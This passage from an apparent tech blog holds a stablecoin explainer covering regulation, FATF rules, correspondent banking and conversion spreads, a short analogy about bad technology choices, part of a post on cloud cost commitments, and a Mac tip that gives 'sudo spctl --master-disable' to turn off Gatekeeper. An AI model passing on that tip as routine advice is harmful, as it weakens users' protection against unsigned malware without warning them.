Algorithmic stablecoins attempt to maintain their peg through automated supply adjustments based on market demand, without traditional collateral backing. These have proven to be the most controversial and risky category.

2. Why Do Stablecoins Exist?

Stablecoins emerged to solve several critical problems in both traditional finance and the cryptocurrency ecosystem.

In the crypto world, they provide a stable store of value and medium of exchange. Traders use stablecoins to move in and out of volatile positions without converting back to fiat currency, avoiding the delays and fees associated with traditional banking. They serve as a safe harbor during market turbulence and enable seamless transactions across different blockchain platforms.

For cross border payments and remittances, stablecoins offer significant advantages over traditional methods. International transfers that typically take days and cost substantial fees can be completed in minutes for a fraction of the cost. This makes them particularly valuable for workers sending money to families in other countries or businesses conducting international trade.

Stablecoins also address financial inclusion challenges. In countries with unstable currencies or limited banking infrastructure, they provide access to a stable digital currency that can be held and transferred using just a smartphone. This opens up financial services to the unbanked and underbanked populations worldwide.

2.1 How Do Stablecoins Move Money?

Stablecoins move between countries by riding on public or permissioned blockchains rather than correspondent banking rails. When a sender in one country initiates a payment, their bank or payment provider converts local currency into a regulated stablecoin (for example a USD or EUR backed token) and sends that token directly to the recipient bank’s blockchain address. The transaction settles globally in minutes with finality provided by the blockchain, not by intermediaries. To participate, a bank joins a stablecoin network by becoming an authorised issuer or distributor, integrating custody and wallet infrastructure, and connecting its core banking systems to blockchain rails via APIs. On the receiving side, the bank accepts the stablecoin, performs compliance checks (KYC, AML, sanctions screening), and redeems it back into local currency for the client’s account. Because value moves as tokens on chain rather than as messages between correspondent banks, there is no need for SWIFT messaging, nostro/vostro accounts, or multi-day settlement, resulting in faster, cheaper, and more transparent cross border payments.

If a bank does not want the operational and regulatory burden of running its own digital asset custody, it can partner with specialist technology and infrastructure providers that offer custody, wallet management, compliance tooling, and blockchain connectivity as managed services. In this model, the bank retains the customer relationship and regulatory accountability, while the tech partner handles private key security, smart-contract interaction, transaction monitoring, and network operations under strict service-level and audit agreements. Commonly used players in this space include Fireblocks and Copper for institutional custody and secure transaction orchestration; Anchorage Digital and BitGo for regulated custody and settlement services; Circle for stablecoin issuance and on-/off-ramps (USDC); Coinbase Institutional for custody and liquidity; and Stripe or Visa for fiat to stablecoin on-ramps and payment integration. This partnership approach allows banks to move quickly into stablecoin based cross-border payments without rebuilding their core infrastructure or taking on unnecessary operational risk.

3. How Do Stablecoins Make Money?

Stablecoin issuers have developed several revenue models that can be remarkably profitable.

The primary revenue source for fiat backed stablecoins is interest on reserves. When issuers hold billions of dollars in US Treasury bills or other interest bearing assets backing their stablecoins, they earn substantial returns. For instance, with interest rates at 5%, a stablecoin issuer with $100 billion in reserves could generate $5 billion annually while still maintaining the 1:1 peg. Users typically receive no interest on their stablecoin holdings, allowing issuers to pocket the entire yield.

Transaction fees represent another revenue stream. While often minimal, the sheer volume of stablecoin transactions generates significant income. Some issuers charge fees for minting (creating) or redeeming stablecoins, particularly for large institutional transactions.

Premium services for institutional clients provide additional revenue. Banks, payment processors, and large enterprises often pay for faster settlement, higher transaction limits, dedicated support, and integration services.

Many stablecoin platforms also generate revenue through their broader ecosystem. This includes charging fees on decentralized exchanges, lending protocols, or other financial services built around the stablecoin.

3.1 The Pendle Revenue Model: Yield Trading Innovation

Pendle represents an innovative evolution in the DeFi stablecoin ecosystem through its yield trading protocol. Rather than issuing stablecoins directly, Pendle creates markets for trading future yield on stablecoin deposits and other interest bearing assets.

The Pendle revenue model operates through several mechanisms. The protocol charges trading fees on its automated market makers (AMMs), typically around 0.1% to 0.3% per swap. When users trade yield tokens on Pendle’s platform, a portion of these fees goes to the protocol treasury while another portion rewards liquidity providers who supply capital to the trading pools.

Pendle’s unique approach involves splitting interest bearing tokens into two components: the principal token (PT) representing the underlying asset, and the yield token (YT) representing the future interest. This separation allows sophisticated users to speculate on interest rates, hedge yield exposure, or lock in fixed returns on their stablecoin holdings.

The protocol generates revenue through swap fees, redemption fees when tokens mature, and potential governance token value capture as the protocol grows. This model demonstrates how stablecoin adjacent services can create profitable businesses by adding layers of financial sophistication on top of basic stablecoin infrastructure. Pendle particularly benefits during periods of high interest rates, when demand for yield trading increases and the potential returns from separating yield rights become more valuable.

4. Security and Fraud Concerns

Stablecoins face several critical security and fraud challenges that potential users and regulators must consider.

Reserve transparency and verification remain the most significant concern. Issuers must prove they actually hold the assets backing their stablecoins. Several controversies have erupted when stablecoin companies failed to provide clear, audited proof of reserves. The risk is that an issuer might not have sufficient backing, leading to a bank run scenario where the peg collapses and users cannot redeem their coins.

Smart contract vulnerabilities pose technical risks. Stablecoins built on blockchain platforms rely on code that, if flawed, can be exploited by hackers. Major hacks have resulted in hundreds of millions of dollars in losses, and once stolen, blockchain transactions are typically irreversible.

Regulatory uncertainty creates ongoing challenges. Different jurisdictions treat stablecoins differently, and the lack of clear, consistent regulation creates risks for both issuers and users. There’s potential for sudden regulatory action that could freeze assets or shut down operations.

Counterparty risk is inherent in centralized stablecoins. Users must trust the issuing company to maintain reserves, operate honestly, and remain solvent. If the company fails or acts fraudulently, users may lose their funds with limited recourse.

The algorithmic stablecoin model has proven particularly vulnerable. The catastrophic collapse of TerraUSD in 2022, which lost over $40 billion in value, demonstrated that algorithmic mechanisms can fail spectacularly under market stress, creating devastating losses for holders.

Money laundering and sanctions evasion concerns have drawn regulatory scrutiny. The pseudonymous nature of cryptocurrency transactions makes stablecoins attractive for illicit finance, though blockchain’s transparent ledger also makes transactions traceable with proper tools and cooperation.

4.1 Monitoring Stablecoin Flows

Effective monitoring of stablecoin flows has become critical for financial institutions, regulators, and the issuers themselves to ensure compliance, detect fraud, and understand market dynamics.

On Chain Analytics Tools provide the foundation for stablecoin monitoring. Since most stablecoins operate on public blockchains, every transaction is recorded and traceable. Companies like Chainalysis, Elliptic, and TRM Labs specialize in blockchain analytics, offering platforms that track stablecoin movements across wallets and exchanges. These tools can identify patterns, flag suspicious activities, and trace funds through complex transaction chains.

Real Time Transaction Monitoring systems alert institutions to potentially problematic flows. These systems track large transfers, unusual transaction patterns, rapid movement between exchanges (potentially indicating wash trading or manipulation), and interactions with known illicit addresses. Financial institutions integrating stablecoins must implement monitoring comparable to traditional payment systems.

Wallet Clustering and Entity Attribution techniques help identify the real world entities behind blockchain addresses. By analyzing transaction patterns, timing, and common input addresses, analytics firms can cluster related wallets and often attribute them to specific exchanges, services, or even individuals. This capability is crucial for understanding who holds stablecoins and where they’re being used.

Reserve Monitoring and Attestation focuses on the issuer side. Independent auditors and blockchain analysis firms track the total supply of stablecoins and verify that corresponding reserves exist. Circle, for instance, publishes monthly attestations from accounting firms. Some advanced monitoring systems provide real time transparency by linking on chain supply data with bank account verification.

Cross Chain Tracking has become essential as stablecoins exist across multiple blockchains. USDC and USDT operate on Ethereum, Tron, Solana, and other chains, requiring monitoring solutions that aggregate data across these ecosystems to provide a complete picture of flows.

Market Intelligence and Risk Assessment platforms combine on chain data with off chain information to assess concentration risk, identify potential market manipulation, and provide early warning of potential instability. When a small number of addresses hold large stablecoin positions, it creates systemic risk that monitoring can help quantify.

Banks and financial institutions implementing stablecoins typically deploy a combination of commercial blockchain analytics platforms, custom monitoring systems, and compliance teams trained in cryptocurrency investigation. The goal is achieving the same level of financial crime prevention and risk management that exists in traditional banking while adapting to the unique characteristics of blockchain technology.

5. How Regulators View Stablecoins

Regulatory attitudes toward stablecoins vary significantly across jurisdictions, but common themes and concerns have emerged globally.

United States Regulatory Approach involves multiple agencies with overlapping jurisdictions. The Securities and Exchange Commission (SEC) has taken the position that some stablecoins may be securities, particularly those offering yield or governed by investment contracts. The Commodity Futures Trading Commission (CFTC) views certain stablecoins as commodities. The Treasury Department and the Financial Stability Oversight Council have identified stablecoins as potential systemic risks requiring bank like regulation.

Proposed legislation in the US Congress has sought to create a comprehensive framework requiring stablecoin issuers to maintain high quality liquid reserves, submit to regular audits, and potentially obtain banking charters or trust company licenses. The regulatory preference is clearly toward treating major stablecoin issuers as financial institutions subject to banking supervision.

European Union Regulation has taken a more structured approach through the Markets in Crypto Assets (MiCA) regulation, which came into effect in 2024. MiCA establishes clear requirements for stablecoin issuers including reserve asset quality standards, redemption rights for holders, capital requirements, and governance standards. The regulation distinguishes between smaller stablecoin operations and “significant” stablecoins that require more stringent oversight due to their systemic importance.

United Kingdom Regulators are developing a framework that treats stablecoins used for payments as similar to traditional payment systems. The Bank of England and Financial Conduct Authority have indicated that stablecoin issuers should meet standards comparable to commercial banks, including holding reserves in central bank accounts or high quality government securities.

Asian Regulatory Perspectives vary widely. Singapore’s Monetary Authority has created a licensing regime for stablecoin issuers focused on reserve management and redemption guarantees. Hong Kong is developing similar frameworks. China has banned private stablecoins entirely while developing its own central bank digital currency. Japan requires stablecoin issuers to be licensed banks or trust companies.

Key Regulatory Concerns consistently include systemic risk (the failure of a major stablecoin could trigger broader financial instability), consumer protection (ensuring holders can redeem stablecoins for fiat currency), anti money laundering compliance, reserve adequacy and quality, concentration risk in the Treasury market (if stablecoin reserves significantly increase holdings of government securities), and the potential for stablecoins to facilitate capital flight or undermine monetary policy.

Central Bank Digital Currencies (CBDCs) represent a regulatory response to private stablecoins. Many central banks are developing or piloting digital currencies partly to provide a public alternative to private stablecoins, allowing governments to maintain monetary sovereignty while capturing the benefits of digital currency.

The regulatory trend is clearly toward treating stablecoins as systemically important financial infrastructure requiring oversight comparable to banks or payment systems, with an emphasis on reserve quality, redemption rights, and anti money laundering compliance.

5.1 How Stablecoins Impact the Correspondent Banking Model

Stablecoins pose both opportunities and existential challenges to the traditional correspondent banking system that has dominated international payments for decades.

The Traditional Correspondent Banking Model relies on a network of banking relationships where banks hold accounts with each other to facilitate international transfers. When a business in Brazil wants to pay a supplier in Thailand, the payment typically flows through multiple intermediary banks, each taking fees and adding delays. This system involves currency conversion, compliance checks at multiple points, and settlement risk, making international payments slow and expensive.

Stablecoins as Direct Competition offer a fundamentally different model. A business can send USDC directly to a recipient anywhere in the world in minutes, bypassing the correspondent banking network entirely. The recipient can then convert to local currency through a local exchange or payment processor. This disintermediation threatens the fee generating correspondent banking relationships that have been profitable for banks, particularly in remittance corridors and business to business payments.

Cost and Speed Advantages are significant. Traditional correspondent banking involves fees at multiple layers, often totaling 3-7% for remittances and 1-3% for business payments, with settlement taking 1-5 days. Stablecoin transfers can cost less than 1% including conversion fees, with settlement in minutes. This efficiency gap puts pressure on banks to either adopt stablecoin technology or risk losing payment volume.

The Disintermediation Threat extends beyond just payments. Correspondent banking generates substantial revenue for major international banks through foreign exchange spreads, service fees, and liquidity management. If businesses and individuals can hold and transfer value in stablecoins, they become less dependent on banks for international transactions. This is particularly threatening in high volume, low margin corridors where efficiency matters most.

Banks Adapting Through Integration represents one response to this threat. Rather than being displaced, some banks are incorporating stablecoins into their service offerings. They can issue their own stablecoins, partner with stablecoin issuers to provide on ramps and off ramps, or offer custody and transaction services for corporate clients wanting to use stablecoins. JPMorgan’s JPM Coin exemplifies this approach, using blockchain technology and stablecoin principles for institutional payments within a bank controlled system.

The Hybrid Model Emerging in practice combines stablecoins with traditional banking. Banks provide the fiat on ramps and off ramps, regulatory compliance, customer relationships, and local currency conversion, while stablecoins handle the actual transfer of value. This partnership model allows banks to maintain their customer relationships and regulatory compliance role while capturing efficiency gains from blockchain technology.

Regulatory Arbitrage Concerns arise because stablecoins can sometimes operate with less regulatory burden than traditional correspondent banking. Banks face extensive anti money laundering requirements, capital requirements, and regulatory scrutiny. If stablecoins provide similar services with lighter regulation, they gain a competitive advantage that regulators are increasingly seeking to eliminate through tighter stablecoin oversight.

Settlement Risk and Liquidity Management change fundamentally with stablecoins. Traditional correspondent banking requires banks to maintain nostro accounts (accounts held in foreign banks) prefunded with liquidity. Stablecoins allow for near instant settlement without prefunding requirements, potentially freeing up billions in trapped liquidity that banks currently must maintain across the correspondent network.

The long term impact will likely involve correspondent banking evolving rather than disappearing. Banks will increasingly serve as regulated gateways between fiat currency and stablecoins, while stablecoins handle the actual transfer of value. The most vulnerable players are mid tier correspondent banks that primarily provide routing services without strong customer relationships or value added services.

5.2 How FATF Standards Apply to Stablecoins

The Financial Action Task Force (FATF) provides international standards for combating money laundering and terrorist financing, and these standards have been extended to cover stablecoins and other virtual assets.

The Travel Rule represents the most significant FATF requirement affecting stablecoins. Originally designed for traditional wire transfers, the Travel Rule requires that information about the originator and beneficiary of transfers above a certain threshold (typically $1,000) must travel with the transaction. For stablecoins, this means that Virtual Asset Service Providers (VASPs) such as exchanges, wallet providers, and payment processors must collect and transmit customer information when facilitating stablecoin transfers.

Implementing the Travel Rule on public blockchains creates technical challenges. While bank wire transfers pass through controlled systems where information can be attached, blockchain transactions are peer to peer and pseudonymous. The industry has developed solutions like the Travel Rule Information Sharing Architecture (TRISA) and other protocols that allow VASPs to exchange customer information securely off chain while the stablecoin transaction occurs on chain.

Know Your Customer (KYC) and Customer Due Diligence requirements apply to any entity that provides services for stablecoin transactions. Exchanges, wallet providers, and payment processors must verify customer identities, assess risk levels, and maintain records of transactions. This requirement creates a tension with the permissionless nature of blockchain technology, where anyone can hold a self hosted wallet and transact directly without intermediaries.

VASP Registration and Licensing is required in most jurisdictions following FATF guidance. Any business providing stablecoin custody, exchange, or transfer services must register with financial authorities, implement anti money laundering programs, and submit to regulatory oversight. This has created significant compliance burdens for smaller operators and driven consolidation toward larger, well capitalized platforms.

Stablecoin Issuers as VASPs are generally classified as Virtual Asset Service Providers under FATF standards, subjecting them to the full range of anti money laundering and counter terrorist financing obligations. This includes transaction monitoring, suspicious activity reporting, and sanctions screening. Major issuers like Circle and Paxos have built sophisticated compliance programs comparable to traditional financial institutions.

The Self Hosted Wallet Challenge represents a key friction point. FATF has expressed concern about transactions involving self hosted (non custodial) wallets where users control their own private keys without intermediary oversight. Some jurisdictions have proposed restricting or requiring enhanced due diligence for transactions between VASPs and self hosted wallets, though this remains controversial and difficult to enforce technically.

Cross Border Coordination is essential but challenging. Stablecoins operate globally and instantly, but regulatory enforcement is jurisdictional. FATF promotes information sharing between national financial intelligence units and encourages mutual legal assistance. However, gaps in enforcement across jurisdictions create opportunities for regulatory arbitrage, where bad actors operate from jurisdictions with weak oversight.

Sanctions Screening is mandatory for stablecoin service providers. They must screen transactions against lists of sanctioned individuals, entities, and countries maintained by organizations like the US Office of Foreign Assets Control (OFAC). Several stablecoin issuers have demonstrated the ability to freeze funds in wallets associated with sanctioned addresses, showing that even decentralized systems can implement centralized controls when required by law.

Risk Based Approach is fundamental to FATF methodology. Service providers must assess the money laundering and terrorist financing risks specific to their operations and implement controls proportionate to those risks. For stablecoins, this means considering factors like transaction volumes, customer types, geographic exposure, and the underlying blockchain’s anonymity features.

Challenges in Implementation are significant. The pseudonymous nature of blockchain transactions makes it difficult to identify ultimate beneficial owners. The speed and global reach of stablecoin transfers compress the time window for intervention. The prevalence of decentralized exchanges and peer to peer transactions creates enforcement gaps. Some argue that excessive regulation will drive activity to unregulated platforms or privacy focused cryptocurrencies, making financial crime harder rather than easier to detect.

The FATF framework essentially attempts to impose traditional financial system controls on a technology designed to operate without intermediaries. While large, regulated stablecoin platforms can implement these requirements, the tension between regulatory compliance and the permissionless nature of blockchain technology remains unresolved and continues to drive both technological innovation and regulatory evolution.

6. Good Use Cases for Stablecoins

Despite the risks, stablecoins excel in several legitimate applications that offer clear advantages over traditional alternatives.

Cross border payments and remittances benefit enormously from stablecoins. Workers sending money home can avoid high fees and long delays, with transactions settling in minutes rather than days. Businesses conducting international trade can reduce costs and streamline operations significantly.

Treasury management for crypto native companies provides a practical use case. Cryptocurrency exchanges, blockchain projects, and Web3 companies need stable assets for operations while staying within the crypto ecosystem. Stablecoins let them hold working capital without exposure to crypto volatility.

Decentralized finance (DeFi) applications rely heavily on stablecoins. They enable lending and borrowing, yield farming, liquidity provision, and trading without the complications of volatile assets. Users can earn interest on stablecoin deposits or use them as collateral for loans.

Hedging against local currency instability makes stablecoins valuable in countries experiencing hyperinflation or currency crises. Citizens can preserve purchasing power by holding dollar backed stablecoins instead of rapidly devalating local currencies.

Programmable payments and smart contracts benefit from stablecoins. Businesses can automate payments based on conditions (such as releasing funds when goods are received) or create subscription services, escrow arrangements, and other complex payment structures that execute automatically.

Ecommerce and online payments increasingly accept stablecoins as they combine the low fees of cryptocurrency with price stability. This is particularly valuable for digital goods, online services, and merchant payments where volatility would be problematic.

6.1 Companies Specializing in Banking Stablecoin Integration

Several companies have emerged as leaders in helping traditional banks launch and integrate stablecoin solutions into their existing infrastructure.

Paxos is a regulated blockchain infrastructure company that provides white label stablecoin solutions for financial institutions. They’ve partnered with major companies to issue stablecoins and offer compliance focused infrastructure that meets banking regulatory requirements. Paxos handles the technical complexity while allowing banks to maintain their customer relationships.

Circle offers comprehensive business account services and APIs that enable banks to integrate USD Coin (USDC) into their platforms. Their developer friendly tools and banking partnerships have made them a go to provider for institutions wanting to offer stablecoin services. Circle emphasizes regulatory compliance and transparency with regular reserve attestations.

Fireblocks provides institutional grade infrastructure for banks looking to offer digital asset services, including stablecoins. Their platform handles custody, treasury operations, and connectivity to various blockchains, allowing banks to offer stablecoin functionality without building everything from scratch.

Taurus specializes in digital asset infrastructure for banks, wealth managers, and other financial institutions in Europe. They provide technology for custody, tokenization, and trading that enables traditional financial institutions to offer stablecoin services within existing regulatory frameworks.

Sygnum operates as a Swiss digital asset bank and offers banking as a service solutions. They help other banks integrate digital assets including stablecoins while ensuring compliance with Swiss banking regulations. Their approach combines traditional banking security with blockchain innovation.

Ripple has expanded beyond its cryptocurrency focus to offer enterprise blockchain solutions for banks, including infrastructure for stablecoin issuance and cross border payment solutions. Their partnerships with financial institutions worldwide position them as a bridge between traditional banking and blockchain technology.

BBVA and JPMorgan have also developed proprietary solutions (JPM Coin for JPMorgan) that other institutions might license or use as models, though these are typically more focused on their own operations and select partners.

7.1 The Bid Offer Spread Challenge: Liquidity vs. True 1:1 Conversions

One of the hidden costs in stablecoin adoption that significantly impacts user economics is the bid offer spread applied during conversions between fiat currency and stablecoins. While stablecoins are designed to maintain a 1:1 peg with their underlying asset (typically the US dollar), the reality of converting between fiat and crypto introduces market dynamics that can erode this theoretical parity.

7.1 Understanding the Spread Problem

When users convert fiat currency to stablecoins or vice versa through most platforms, they encounter a bid offer spread the difference between the buying price and selling price. Even though USDC or USDT theoretically equals $1.00, a platform might effectively charge $1.008 to buy a stablecoin and offer only $0.992 when selling it back. This 0.8% to 1.5% spread represents a significant friction cost, particularly for businesses making frequent conversions or moving large amounts.

This spread exists because most platforms operate market making models where they must maintain liquidity on both sides of the transaction. Holding inventory of both fiat and stablecoins involves costs: capital tied up in reserves, exposure to brief depegging events, regulatory compliance overhead, and the operational expense of managing banking relationships for fiat on ramps and off ramps. Platforms traditionally recover these costs through the spread rather than explicit fees.

For cryptocurrency exchanges and most fintech platforms, the spread also serves as their primary revenue mechanism for stablecoin conversions. When a platform facilitates thousands or millions of conversions daily, even small spreads generate substantial income. The spread compensates for the risk that during periods of market stress, stablecoins might temporarily trade below their peg, leaving the platform holding depreciated assets.

7.2 The Impact on Users and Business Operations

The cumulative effect of bid offer spreads becomes particularly painful for certain use cases. Small and medium sized businesses operating across borders face multiple conversion points: exchanging local currency to USD, converting USD to stablecoins for cross border transfer, then converting stablecoins back to USD or local currency at the destination. Each conversion compounds the cost, potentially consuming 2% to 4% of the transaction value when combined with traditional banking fees.

For businesses using stablecoins as working capital converting payroll, managing treasury operations, or settling international invoices the spread can eliminate much of the cost advantage that stablecoins are supposed to provide over traditional correspondent banking. A company converting $100,000 might effectively pay $1,500 in spread costs on a round trip conversion, comparable to traditional wire transfer fees that stablecoins aimed to disrupt.

Individual users in countries with unstable currencies face similar challenges. While holding USDT or USDC protects against local currency devaluation, the cost of frequently moving between local currency and stablecoins can be prohibitive. The spread becomes a “tax” on financial stability that disproportionately affects those who can least afford it.

7.3 Revolut’s 1:1 Model: Internalizing the Cost

Revolut’s recent introduction of true 1:1 conversions between USD and stablecoins (USDC and USDT) represents a fundamentally different approach to solving the spread problem. Rather than passing market making costs to users, Revolut absorbs the spread internally, guaranteeing that $1.00 in fiat equals exactly 1.00 stablecoin units in both directions, with no hidden markups.

This model is economically viable for Revolut because of several structural advantages. First, as a neobank with 65 million users and existing banking infrastructure, Revolut already maintains substantial fiat currency liquidity and doesn’t need to rely on external banking partners for every stablecoin conversion. Second, the company generates revenue from other services within its ecosystem subscription fees, interchange fees from card spending, interest on deposits allowing it to treat stablecoin conversions as a loss leader or break even feature that enhances customer retention and platform stickiness.

Third, by setting a monthly limit of approximately $578,000 per customer, Revolut manages its risk exposure while still accommodating the vast majority of retail and small business use cases. This prevents arbitrage traders from exploiting the zero spread model to make risk free profits by moving large volumes between Revolut and other platforms where spreads exist.

Revolut essentially bets that the value of removing friction from fiat crypto conversions thereby making stablecoins genuinely useful as working capital rather than speculative assets will drive sufficient user engagement and platform growth to justify the cost of eliminating spreads. For users, this transforms the economics of stablecoin usage, particularly for frequent converters or those operating in high currency volatility environments.

7.4 Why Not Everyone Can Offer 1:1 Conversions

The challenge for smaller platforms and pure cryptocurrency exchanges is that they lack Revolut’s structural advantages. A standalone crypto exchange without banking licenses and integrated fiat services must partner with banks for fiat on ramps, pay fees to those partners, maintain separate liquidity pools, and manage the regulatory complexity of operating in multiple jurisdictions. These costs don’t disappear simply because users want better rates they must be recovered somehow.

Additionally, maintaining tight spreads or true 1:1 conversions requires deep liquidity and sophisticated risk management. When thousands of users simultaneously want to exit stablecoins during market stress, a platform must have sufficient reserves to honor redemptions instantly without moving the price. Smaller platforms operating with thin liquidity buffers cannot safely eliminate spreads without risking insolvency during volatile periods.

The market structure for stablecoins also presents challenges. While stablecoins theoretically maintain 1:1 pegs, secondary market prices on decentralized exchanges and between different platforms can vary by small amounts. A platform offering guaranteed 1:1 conversions must either hold sufficient reserves to absorb these variations or accept that arbitrage traders will exploit any price discrepancies, potentially draining liquidity.

7.5 The Competitive Implications

Revolut’s move to zero spread stablecoin conversions could trigger a competitive dynamic in the fintech space, similar to how its original zero fee foreign exchange offering disrupted traditional currency conversion. Established players like Coinbase, Kraken, and other major exchanges will face pressure to reduce their spreads or explain why their costs remain higher.

For traditional banks contemplating stablecoin integration, the spread question becomes strategic. Banks could follow the Revolut model, absorbing spread costs to drive adoption and maintain customer relationships in an increasingly crypto integrated financial system. Alternatively, they might maintain spreads but offer other value added services that justify the cost, such as enhanced compliance, insurance on holdings, or integration with business treasury management systems.

The long term outcome may be market segmentation. Large, integrated fintech platforms with diverse revenue streams can offer true 1:1 conversions as a competitive advantage. Smaller, specialized platforms will continue operating with spreads but may differentiate through speed, blockchain coverage, or serving specific niches like high volume traders who value depth of liquidity over tight spreads.

For stablecoin issuers like Circle and Tether, the spread dynamics affect their business indirectly. Wider spreads on third party platforms create friction that slows stablecoin adoption, reducing the total assets under management that generate interest income for issuers. Partnerships with platforms offering tighter spreads or true 1:1 conversions could accelerate growth, even if those partnerships involve revenue sharing or other commercial arrangements.

Ultimately, the bid offer spread challenge highlights a fundamental tension in stablecoin economics: the gap between the theoretical promise of 1:1 value stability and the practical costs of maintaining liquidity, managing risk, and operating the infrastructure that connects fiat currency to blockchain based assets. Platforms that can bridge this gap efficiently whether through scale, integration, or innovative business models will have significant competitive advantages as stablecoins move from crypto native use cases into mainstream financial infrastructure.

8. Conclusion

Stablecoins represent a significant innovation in digital finance, offering the benefits of cryptocurrency without extreme volatility. They’ve found genuine utility in payments, remittances, and decentralized finance while generating substantial revenue for issuers through interest on reserves. However, they also carry real risks around reserve transparency, regulatory uncertainty, and potential fraud that users and institutions must carefully consider.

The regulatory landscape is rapidly evolving, with authorities worldwide moving toward treating stablecoins as systemically important financial infrastructure requiring bank like oversight. FATF standards impose traditional anti money laundering requirements on stablecoin service providers, creating compliance obligations comparable to traditional finance. Meanwhile, sophisticated monitoring tools have emerged to track flows, detect illicit activity, and ensure reserve adequacy.

For traditional banks, stablecoins represent both a competitive threat to correspondent banking models and an opportunity to modernize payment infrastructure. Rather than being displaced entirely, banks are increasingly positioning themselves as regulated gateways between fiat currency and stablecoins, maintaining customer relationships and compliance functions while leveraging blockchain efficiency.

For banks considering stablecoin integration, working with established infrastructure providers can mitigate technical and compliance challenges. The key is choosing use cases where stablecoins offer clear advantages, particularly in cross border payments and treasury management, while implementing robust risk management, transaction monitoring, and ensuring regulatory compliance with both traditional financial regulations and emerging crypto specific frameworks.

As the regulatory landscape evolves and technology matures, stablecoins are likely to become increasingly integrated into mainstream financial services. Their success will depend on maintaining trust through transparency, security, and regulatory cooperation while continuing to deliver value that traditional financial rails cannot match. The future likely involves a hybrid model where stablecoins and traditional banking coexist, each playing to their respective strengths in a more efficient, global financial system.

0
0

Technology Culture: The Sinking Car Syndrome

This is (hopefully) a short blog that will give you back a small piece of your life…

In technology, we rightly spend hours pouring over failure in order that we might understand it and therefore fix it and avoid it in the future. This seems a reasonable approach, learn from your mistakes, understand failure, plan your remediation etc etc. But is it possible that there are some instances where doing this is inappropriate? To answer this simple question, let me give you an analogy…

You decide that you want to travel from London to New York. Sounds reasonable so far…. But you decide you want to go by car! The reasoning for this is as follows:

  1. Cars are “tried and tested”.
  2. We have an existing deal with multiple car suppliers and we get great discounts.
  3. The key decision maker is a car enthusiast.
  4. The incumbent team understand cars and can support this choice.
  5. Cars are what we have available right now and we want to start execution tomorrow, so lets just make it work.

You first try a small hatchback and only manage to get around 3m off the coast of Scotland. Next up you figure you will get a more durable car, so you get a truck – but sadly this only makes 2m headway from the beach. You report back to the team and they send you a brand new Porsche and this time you give yourself an even bigger run up at the sea and you manage to make a whopping 4m, before the car sinks. The team now analyse all the data to figure out why each car sunk and what they can do to make this better. The team continue to experiment with various cars and progress is observed over time. After 6 months the team has managed to travel 12m towards their goal of driving to New York. The main reason for the progress is that the sunken cars are starting to form a land bridge. The leadership has now spent over 200m USD on this venture and don’t feel they can pivot, so they start to brainstorm how to make this work.

Maybe wind the windows up a little tighter, maybe the cars need more underseal, maybe over inflate the tyres or maybe we simply need way more cars? All of these may or may not make a difference. But here’s the challenge: you made a bad engineering choice and anything you do will just be a variant of bad. It will never be good and you cannot win with your choice.

The above obviously sounds a bit daft (and it is), but the point is that I am often called in after downtime to review an architecture to find a route cause and suggest remediation. But what is not always understood is that bad technology choices can be as likely to succeed as driving from London to New York. Sometimes you simply need to look at alternatives, you need a boat or a plane. The product architecture can be terminal, it wont ever be what you want it to be and no amount of analysis or spend will change this. The trick is to accept the brutal reality of your situation and move your focus towards choosing the technology that you need to transition to. Next try and figure out how quickly can you can do this pivot…

0
0

How to Install Apps From Anywhere on Apple Mac

Previously Macs would allow you to install software from anywhere. Now you will see the error message “NMAPxx.mpkg cannot be opened because its from an unidentified developer”. If you want to fix this and enable apps to be install from anywhere, you will need to run the following command line:

sudo spctl --master-disable

Once you have run the script you should then see the “Anywhere” option in the System Preferences > Security & Privacy Tab!

0
0

Part 2: Increasing your Cloud consumption (the sane way)

Introduction

This article follows on from the “Cloud Migrations Crusade” blog post…

A single tenancy datacenter is a fixed scale, fixed price service on a closed network. The costs of the resources in the datacenter are divided up and shared out to the enterprise constituents on a semi-random basis. If anyone uses less resources than the forecast this generates waste which is shared back to the enterprise. If there is more demand than forecasted, it will either generate service degradation, panic or an outage! This model is clearly fragile and doesn’t respond quickly to change; it is also wasteful as it requires a level of overprovisioning based on forecast consumption (otherwise you will experience delays in projects, service degradation or have reduced resilience).

Cloud, on the other hand is a multi-tenanted on demand software service which you pay for as you use. But surely having multiple tenants running on the same fixed capacity actually increases the risks, and just because its in the cloud it doesn’t mean that you can get away without over provisioning – so who sits with the over provisioned costs? The cloud providers have to build this into their rates. So cloud providers have to deal with a balance sheet of fixed capacity shared amongst customers running on demand infrastructure. They do this with very clever forecasting, very short provisioning cycles and asking their customers for forecasts and then offering discounts for pre-commits.

Anything that moves you back towards managing resources levels / forecasting will destroy a huge portion of the value of moving to the cloud in the first instance. For example, if you have ever been to a Re:Invent you will be flawed by the rate of innovation and also how easy it is to absorb these new innovative products. But wait – you just signed a 5yr cost commit and now you learn about Aurura’s new serverless database model. You realise that you can save millions of dollars; but you have to wait for your 5yr commits to expire before you adopt or maybe start mining bitcoin with all your excess commits! This is anti-innovation and anti-customer.

Whats even worse is that pre-commits are typically signed up front on day 1- this is total madness!!! At the point where you know nothing about your brave new world, you use the old costs as a proxy to predict the new costs so that you can squeeze a lousy 5px saving at the risk of 100px of the commit size! What you will start to learn is that your cloud success is NOT based on the commercial contract that you sign with your cloud provider; its actually based on the quality of the engineering talent that your organisation is able to attract. Cloud is a IP war – its not a legal/sourcing war. Allow yourself to learn, don’t box yourself in on day 1. When you sign the pre-commit you will notice your first year utilisation projections are actually tiny and therefore the savings are small. So whats the point of signing so early on when the risk is at a maximum and the gains are at a minimum? When you sign this deal you are essentially turning the cloud into a “financial data center” – you have destroyed the cloud before you even started!

A Lesson from the field – Solving Hadoop Compute Demand Spike:

We moved 7000 cores of burst compute to AWS to solve a capacity issue on premise. That’s expensive, so lets “fix the costs”! We can go a sign a RI (reserved instance), play with spot, buy savings plans or even beg / barter for some EDP relief. But instead we plugged the service usuage into Quicksight and analysed the queries. We found one query was using 60 percent of the entire banks compute! Nobody confessed to owning the query, so we just disabled it (if you need a reason for your change management; describe the change as “disabling a financial DDOS”). We quickly found the service owner and explained that running a table scan across billions of rows to return a report with just last months data is not a good idea. We also explained that if they don’t fix this we will start billing them in 6 weeks time (a few million dollars). The team deployed a fix and now we run the banks big data stack at half the costs – just by tuning one query!!!

So the point of the above is that there is no substitute for engineering excellence. You have to understand and engineer the cloud to win, you cannot contract yourself into the cloud. The more contracts you sign the more failures you will experience. This leads me to point 2…

Step 2: Training, Training, Training

